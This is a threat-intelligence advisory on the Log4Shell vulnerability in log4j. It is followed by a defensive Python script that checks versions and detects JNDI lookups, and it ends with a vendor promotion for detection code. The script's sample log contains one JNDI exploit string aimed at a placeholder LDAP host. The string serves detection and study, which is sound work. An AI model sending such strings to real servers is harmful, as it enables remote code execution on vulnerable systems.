CVE-2021-44228 / Log4Shell Vulnerability
Industry: N/A | Level: Tactical | Sources: LunaSec & GitHub-Log4Shell-List
A zero-day exploit has been identified for the Java logging library "log4j" that could result in remote code execution. Affected versions include Log4j 2.0-beta9 up to 2.14.1, with service impacts to many Apache Struts configurations and cloud services such as Steam, Apple iCloud, and others. The exploit requires three components: a vulnerable log4j version, any protocol that enables the attacker to send the exploit string, and a log statement that logs the string from the request. Mitigation is available through an update; affected users are recommended to update to log4j version "log4j-2.15.0-rc2". Threat researchers have identified a variety of threats taking advantage of the widespread vulnerability: Kinsing (cryptocurrency miner), Mirai malware, Cobalt Strike, a new unidentified ransomware strain, and likely others yet to be identified.
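As an added example (not from the advisory or its sources), the following Python script checks whether a reported Log4j version string falls inside the affected range given above and scans request log lines for the plain `${jndi:` lookup pattern, which corresponds to the third precondition (a request-controlled string reaching a log statement). The version ordering, the `log4j-` prefix handling and the sample log lines are assumptions constructed for this example.

```python
import re

# Pre-release tags sort before the final release of the same number
# (assumption for this example: alpha < beta < rc < final).
_PRE_ORDER = {"alpha": 0, "beta": 1, "rc": 2}
_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?")


def parse_version(v: str):
    """Turn '2.0-beta9' or 'log4j-2.15.0-rc2' into a comparable tuple."""
    v = v.strip()
    if v.startswith("log4j-"):          # tolerate the artifact-style prefix
        v = v[len("log4j-"):]
    m = _VERSION_RE.fullmatch(v)
    if not m:
        raise ValueError(f"unrecognised Log4j version string: {v!r}")
    major, minor, patch, pre, pre_num = m.groups()
    pre_key = (_PRE_ORDER[pre], int(pre_num)) if pre else (9, 0)
    return (int(major), int(minor), int(patch or 0), *pre_key)


# Affected range stated in the advisory: 2.0-beta9 through 2.14.1 inclusive.
_AFFECTED_LOW = parse_version("2.0-beta9")
_AFFECTED_HIGH = parse_version("2.14.1")


def is_affected(version: str) -> bool:
    """True if the given Log4j version lies inside the advisory's affected range."""
    return _AFFECTED_LOW <= parse_version(version) <= _AFFECTED_HIGH


# Detector for the plain JNDI lookup form only; the advisory does not describe
# other encodings, so none are assumed here.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def find_jndi_lookups(log_lines):
    """Return (line_number, line) for every line containing a ${jndi: lookup."""
    return [(n, line) for n, line in enumerate(log_lines, 1) if JNDI_PATTERN.search(line)]


# Constructed sample access-log lines (not real traffic); the lookup target
# uses the reserved .invalid TLD as a placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://placeholder.invalid/x}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 302 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for ver in ("2.14.1", "log4j-2.15.0-rc2"):
        print(ver, "affected" if is_affected(ver) else "not affected")
    for n, line in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup in logged request data")
```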
**For updates, detection content & logic, attack flow, threat examples & use case demonstrations, check out our Log4Shell blog.** We're here to help by providing ready-to-deploy detection code (no strings attached): just reach out and we'll send you the Splunk (SPL) detection logic. Contact: [email protected]